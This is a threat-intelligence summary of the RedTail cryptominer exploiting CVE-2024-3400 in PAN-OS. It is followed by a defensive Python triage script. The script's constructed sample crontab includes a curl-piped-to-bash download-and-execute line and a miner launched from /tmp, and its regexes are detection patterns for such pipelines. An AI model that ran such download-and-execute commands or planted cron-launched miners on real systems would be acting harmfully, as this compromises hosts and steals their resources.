The RedTail cryptomining malware has been updated to exploit CVE-2024-3400, a vulnerability in PAN-OS. The attackers are using private cryptomining pools for greater control, and the malware now includes advanced anti-research techniques. It spreads through multiple web exploits targeting IoT devices, web applications, SSL-VPNs, and security devices.
Upon disclosure of the vulnerability, there was a notable increase in malicious activity, including attempts to execute commands that download and run a bash script tailored to the victim’s processor architecture. This script downloads the appropriate binary for cryptomining, indicating a sophisticated setup aimed at optimizing mining operations.
The new RedTail variant, packed with the UPX packer, embeds and modifies XMRig's code. Unlike previous versions, it does not call home for its mining configuration; instead, it carries an encrypted configuration that is decrypted in memory. The configuration tunes the mining process with the RandomX algorithm and hugepages settings. The malware employs advanced evasion tactics, such as forking processes and killing debugging instances, and maintains persistence through cron jobs.
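The traits described above (cron-based persistence, UPX packing, hugepages tuning, and a download-and-run bash stage) all leave host-side artefacts a defender can check for. The following host triage script is an added example written for this page; it is not code from the report or from RedTail itself. All sample inputs (the crontab lines, the fake ELF bytes, the meminfo text, the hostnames and IP addresses) are constructed, and none are indicators from the report.

```python
"""Host triage heuristics for the RedTail traits described above.

Constructed example: the crontab, binary bytes and meminfo text below are
made up for illustration and are not indicators from the report.
"""
import re

# Constructed sample crontab (not real IoCs). The second entry mirrors the
# "download a bash script, pipe it to a shell" stage described above; the
# third mirrors cron persistence for a miner dropped in a temp directory.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://198.51.100.10/x86_64.sh | bash
@reboot /tmp/.cache/miner -o pool.example.invalid:3333
"""

# curl/wget output piped straight into a shell (download-and-execute).
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Executables launched from world-writable scratch directories.
TMP_EXEC = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")
# XMRig-style pool/donation flags (assumption: -o/--url and --donate-level
# are the XMRig options most likely to survive on a command line).
MINER_FLAGS = re.compile(r"(^|\s)(-o|--url|--donate-level)\b")


def suspicious_cron_entries(crontab_text):
    """Return [(entry, [reasons])] for crontab lines that match a heuristic."""
    findings = []
    for line in crontab_text.splitlines():
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = []
        if DOWNLOAD_EXEC.search(entry):
            reasons.append("download-and-execute pipeline")
        if TMP_EXEC.search(entry):
            reasons.append("executable in world-writable directory")
        if MINER_FLAGS.search(entry):
            reasons.append("miner-style command-line flags")
        if reasons:
            findings.append((entry, reasons))
    return findings


UPX_MAGIC = b"UPX!"


def is_upx_packed(data):
    """Cheap UPX check: the 'UPX!' marker sits in the packed file's header
    and again in its trailer. Packing alone is not malicious; treat it as one
    signal to combine with the others."""
    return UPX_MAGIC in data[:4096] or UPX_MAGIC in data[-512:]


def hugepages_configured(meminfo_text):
    """True if /proc/meminfo-style text shows hugepages reserved. RandomX
    miners want hugepages; on a box that never asked for them, a non-zero
    HugePages_Total is worth a second look."""
    m = re.search(r"^HugePages_Total:\s+(\d+)", meminfo_text, re.M)
    return bool(m) and int(m.group(1)) > 0


def triage(crontab_text, binary_bytes, meminfo_text):
    """Combine the three checks into a single list of findings."""
    findings = [f"cron: {e} ({'; '.join(r)})"
                for e, r in suspicious_cron_entries(crontab_text)]
    if is_upx_packed(binary_bytes):
        findings.append("binary: UPX-packed")
    if hugepages_configured(meminfo_text):
        findings.append("memory: hugepages reserved")
    return findings


if __name__ == "__main__":
    # Constructed inputs for a stand-alone run.
    fake_elf = b"\x7fELF" + b"\0" * 120 + UPX_MAGIC + b"\0" * 64
    fake_meminfo = "MemTotal:  16000000 kB\nHugePages_Total:    1024\n"
    for f in triage(SAMPLE_CRONTAB, fake_elf, fake_meminfo):
        print(f)
```

On a real host the three inputs come from the user and system crontabs (`/etc/crontab`, `/etc/cron.d/*`, `crontab -l` per user), from the on-disk file behind each suspicious process, and from `/proc/meminfo`; the heuristics are deliberately loose so they surface candidates for a human to review rather than declare compromise.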